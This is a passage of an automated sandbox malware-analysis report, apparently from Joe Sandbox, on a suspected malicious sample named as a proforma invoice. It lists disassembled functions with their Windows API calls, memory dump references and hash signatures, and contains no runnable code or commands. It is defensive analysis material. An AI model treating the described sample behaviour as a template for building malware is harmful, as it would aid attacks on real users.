                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1504782959-0
                                                                                                                    • Opcode ID: e5c8eb2915ca89da81c61c1fe527fb1b20cb768be8ae3e213192890930da4489
                                                                                                                    • Instruction ID: 90d681f14ced62a9c63b116adfeac1a2884262d9b5a5d33d79a9723078211535
                                                                                                                    • Opcode Fuzzy Hash: e5c8eb2915ca89da81c61c1fe527fb1b20cb768be8ae3e213192890930da4489
                                                                                                                    • Instruction Fuzzy Hash: 28115171920109AFCB04FBA4DD9ADEEB7B8AF04311B144169F906A7161DB309E28DFA5
                                                                                                                    Function 002A8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 002A8B61
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A8B73
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A8B89
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A8BA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: c899876cac3befe7f091f5074c231d3e2521e3ef1601a25702fb7313437f00ae
                                                                                                                    • Instruction ID: 31d7a6a36e751ae29c5395df524044a6d65d5537799d55931913656c4ee213b7
                                                                                                                    • Opcode Fuzzy Hash: c899876cac3befe7f091f5074c231d3e2521e3ef1601a25702fb7313437f00ae
                                                                                                                    • Instruction Fuzzy Hash: 1B114C79901218FFDB10DF95CC84F9DBB78FB48310F204095EA00B7290DA716E11DBA4
                                                                                                                    Function 00251290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
                                                                                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 002512D8
                                                                                                                    • GetClientRect.USER32(?,?), ref: 0028B5FB
                                                                                                                    • GetCursorPos.USER32(?), ref: 0028B605
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0028B610
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4127811313-0
                                                                                                                    • Opcode ID: 0bcc4714e8e556217d26f51423d9efd512f18f5e104047edfcdc1e6338e0ad3c
                                                                                                                    • Instruction ID: de30b1377cb934adb6719fb827d3133123f8964c2b91a004bf0869d9828e5cd8
                                                                                                                    • Opcode Fuzzy Hash: 0bcc4714e8e556217d26f51423d9efd512f18f5e104047edfcdc1e6338e0ad3c
                                                                                                                    • Instruction Fuzzy Hash: 80112B35A21029FFCB00DF94D989AFE77B8EB05305F504456FD11E7240C730AA65CBA9
                                                                                                                    Function 002AD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002AD84D
                                                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 002AD864
                                                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002AD879
                                                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 002AD897
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352324309-0
                                                                                                                    • Opcode ID: 535637006136ab4548900ac167ef370596708978d697eb1b39af219cf7de001c
                                                                                                                    • Instruction ID: 48301fd9c63bc9aa9754f7dd9b9e465fd237b741598d53fca640d4eacb65a5e7
                                                                                                                    • Opcode Fuzzy Hash: 535637006136ab4548900ac167ef370596708978d697eb1b39af219cf7de001c
                                                                                                                    • Instruction Fuzzy Hash: D4116575A16304DFE3208F50ED0CF97BBBCEB01700F108969A657D6850DBF8E9569BA1
                                                                                                                    Function 00286FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3016257755-0
                                                                                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                    • Instruction ID: 3cc8a9135d57e9501539cda496d3f31b0ce98bea7cdfb081032cf98fce94bc72
                                                                                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                    • Instruction Fuzzy Hash: E701407A46914EBBCF166F84CC45CED3F66BB28351F688415FE18580B1D236C9B1AF81
                                                                                                                    Function 002DB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002DB2E4
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 002DB2FC
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 002DB320
                                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002DB33B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 357397906-0
                                                                                                                    • Opcode ID: 9da8d4fe0e6b1d003e4520077af05940d5c573d897b390449344206c145ffe3d
                                                                                                                    • Instruction ID: 53bdd0309523c00b767598f927e12f5fa6730b74a8945754b6cc5e472247ca9c
                                                                                                                    • Opcode Fuzzy Hash: 9da8d4fe0e6b1d003e4520077af05940d5c573d897b390449344206c145ffe3d
                                                                                                                    • Instruction Fuzzy Hash: 02117775D00209EFDB41CF99D5449EEBBF9FF08310F108166E915E3620D731AA618F90
                                                                                                                    Function 002B6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 002B6BE6
                                                                                                                      • Part of subcall function 002B76C4: _memset.LIBCMT ref: 002B76F9
                                                                                                                    • _memmove.LIBCMT ref: 002B6C09
                                                                                                                    • _memset.LIBCMT ref: 002B6C16
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 002B6C26
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 48991266-0
                                                                                                                    • Opcode ID: 5b1e02e9fbec9299fc1e0d0505a8016e0884a2857dd46eb63e8d108cb74cd8c9
                                                                                                                    • Instruction ID: 48af15637d4b0189b4879c9e7064d012cb1797b98493344fc9c4c18c7d0fbd05
                                                                                                                    • Opcode Fuzzy Hash: 5b1e02e9fbec9299fc1e0d0505a8016e0884a2857dd46eb63e8d108cb74cd8c9
                                                                                                                    • Instruction Fuzzy Hash: 8DF0303A500100ABCF416F55EC89A8ABB29EF45360F04C061FE095E226C731E921DFB4
                                                                                                                    Function 00252218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(00000008), ref: 00252231
                                                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0025223B
                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00252250
                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00252258
                                                                                                                    • GetWindowDC.USER32(?,00000000), ref: 0028BE83
                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0028BE90
                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0028BEA9
                                                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0028BEC2
                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0028BEE2
                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0028BEED
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1946975507-0
                                                                                                                    • Opcode ID: 59c103b9fb587123dbc5514db2f99bbfe63c4f68d3942eeee226000a5ec42813
                                                                                                                    • Instruction ID: 584b0443ed7b09439afac8325106f996c31ca299915b59fe0de9721033fed7eb
                                                                                                                    • Opcode Fuzzy Hash: 59c103b9fb587123dbc5514db2f99bbfe63c4f68d3942eeee226000a5ec42813
                                                                                                                    • Instruction Fuzzy Hash: 9EE03932915245EADF615FA4FD0D7D83B10EB15332F04C36BFA6A880E187718994DB16
                                                                                                                    Function 002A8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 002A871B
                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,002A82E6), ref: 002A8722
                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002A82E6), ref: 002A872F
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,002A82E6), ref: 002A8736
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3974789173-0
                                                                                                                    • Opcode ID: eb66763343a1fc984fb4ee9aa9a54783b73fac262eab38cc64d3d3d69927c46a
                                                                                                                    • Instruction ID: 355de3964a3584813803212e715b19f1c2f61e04c90990dd4bf8a4f1c438cf10
                                                                                                                    • Opcode Fuzzy Hash: eb66763343a1fc984fb4ee9aa9a54783b73fac262eab38cc64d3d3d69927c46a
                                                                                                                    • Instruction Fuzzy Hash: 13E0863AE162129BD7A05FB07E0CB567BACEF51792F158829B686CA040DA348C51C754
                                                                                                                    Function 00256240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %.
                                                                                                                    • API String ID: 0-3490990516
                                                                                                                    • Opcode ID: 664390d6b5a2ecabb6d4ae355c579a6e70032639a7c30ea0dd1b4390995a8414
                                                                                                                    • Instruction ID: 0bae63cf25f787e61e89e12d01e9e3f1631add3f332b31d0372477d7afdeac37
                                                                                                                    • Opcode Fuzzy Hash: 664390d6b5a2ecabb6d4ae355c579a6e70032639a7c30ea0dd1b4390995a8414
                                                                                                                    • Instruction Fuzzy Hash: 69B1E77182010A9BCF24EF94C489AFEB7B5FF48312F904066ED01A7191DB749EA9CB59
                                                                                                                    Function 002CAEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __itow_s
                                                                                                                    • String ID: xb1$xb1
                                                                                                                    • API String ID: 3653519197-3895555787
                                                                                                                    • Opcode ID: b4768669c3532c51533516a41f3edd71089986328333023cb1682f40c9282710
                                                                                                                    • Instruction ID: 2ef5e16487d427564c93d8290ad8b6fd9a54bf8d744014471723855f7de3f6d6
                                                                                                                    • Opcode Fuzzy Hash: b4768669c3532c51533516a41f3edd71089986328333023cb1682f40c9282710
                                                                                                                    • Instruction Fuzzy Hash: 35B1BF70A1020AEFCB15DF54C891EBABBB9FF58300F14815DF9499B251EB71D9A4CB60
                                                                                                                    Function 002BAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0026FC86: _wcscpy.LIBCMT ref: 0026FCA9
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                    • __wcsnicmp.LIBCMT ref: 002BB02D
                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 002BB0F6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                    • String ID: LPT
                                                                                                                    • API String ID: 3222508074-1350329615
                                                                                                                    • Opcode ID: 51c2ac72832aa29c0d375a6d5f6b6d11308420809d3b87338c0099f92ef95e5f
                                                                                                                    • Instruction ID: da60d29a2c206ebb0c5d62713d94fe297b27855d8c70dff8c5f0a73379eae6f8
                                                                                                                    • Opcode Fuzzy Hash: 51c2ac72832aa29c0d375a6d5f6b6d11308420809d3b87338c0099f92ef95e5f
                                                                                                                    • Instruction Fuzzy Hash: 7A618071A20215EFCB15EF98C895EEEB7B4EB08350F044069F91AAB251D7B0AE94CB54
                                                                                                                    Function 00262957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00262968
                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00262981
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                    • Opcode ID: f56d6dcae5093d511ccac19249390bd78754b837cb5ce853443f4f779ee14c4f
                                                                                                                    • Instruction ID: 6d1a229cdbf2626538981bc7324714ceb89537f35c9e6477ed126391b2f7e4d3
                                                                                                                    • Opcode Fuzzy Hash: f56d6dcae5093d511ccac19249390bd78754b837cb5ce853443f4f779ee14c4f
                                                                                                                    • Instruction Fuzzy Hash: 075158724197449BE320EF10D88ABABBBE8FB85351F41885DF6D8410A1DB70857CCB5A
                                                                                                                    Function 002B9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00254F0B: __fread_nolock.LIBCMT ref: 00254F29
                                                                                                                    • _wcscmp.LIBCMT ref: 002B9824
                                                                                                                    • _wcscmp.LIBCMT ref: 002B9837
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscmp$__fread_nolock
                                                                                                                    • String ID: FILE
                                                                                                                    • API String ID: 4029003684-3121273764
                                                                                                                    • Opcode ID: b646b6a175871ce9e5ae170cea5721ac7106091744a11709030f869591b81d14
                                                                                                                    • Instruction ID: f72559f8bc424a0d3e828d38e95a97772df97093cf20ecc8e0069c18bd465fb6
                                                                                                                    • Opcode Fuzzy Hash: b646b6a175871ce9e5ae170cea5721ac7106091744a11709030f869591b81d14
                                                                                                                    • Instruction Fuzzy Hash: 0F41F831A1020ABADF20AFA4CC49FEFBBBDDF85714F000069FA05B7181DA71A9548B64
                                                                                                                    Function 00290574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID: Dd1$Dd1
                                                                                                                    • API String ID: 1473721057-713089410
                                                                                                                    • Opcode ID: 40318a5ff009a27113b9e162621d2379eb509b2174a486a9164cae1f5c4e1cbf
                                                                                                                    • Instruction ID: 01d1ee210d303e51befb24258a836765192f1e7aead74522e3d1941ead6dfcd2
                                                                                                                    • Opcode Fuzzy Hash: 40318a5ff009a27113b9e162621d2379eb509b2174a486a9164cae1f5c4e1cbf
                                                                                                                    • Instruction Fuzzy Hash: 6B5122786253028FDB54CF19C482A5ABBF1BB88355F54891CED858B320D731EC99CF86
                                                                                                                    Function 002C258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002C259E
                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002C25D4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
